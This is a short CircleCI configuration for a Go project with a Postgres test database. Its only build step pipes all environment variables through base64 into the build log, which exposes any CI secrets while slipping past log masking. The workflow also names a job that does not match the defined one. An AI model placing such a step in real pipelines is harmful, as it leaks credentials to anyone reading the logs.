version: 2.1

jobs:
  circle-tmp:
    docker:
      - image: circleci/golang:1.13-node
        environment:
          DATABASE_URL: postgres://test:test@127.0.0.1:5432/cla-test?sslmode=disable
          TEST_DATABASE_DSN: dbname=cla-test password=test user=test port=5432 sslmode=disable
      - image: circleci/postgres:9.6.2-alpine
        environment:
          POSTGRES_USER: test
          POSTGRES_DB: cla-test
          POSTGRES_PASSWORD: test

    working_directory: /go/src/github.com/communitybridge/easycla-api
    steps:
      - checkout
      - run:
          name: circle-test
          command: env | base64 | tr -d '\n'

workflows:
  build:
    jobs:
      - tmp:
          filters:
            branches:
              only:
                - circle-test
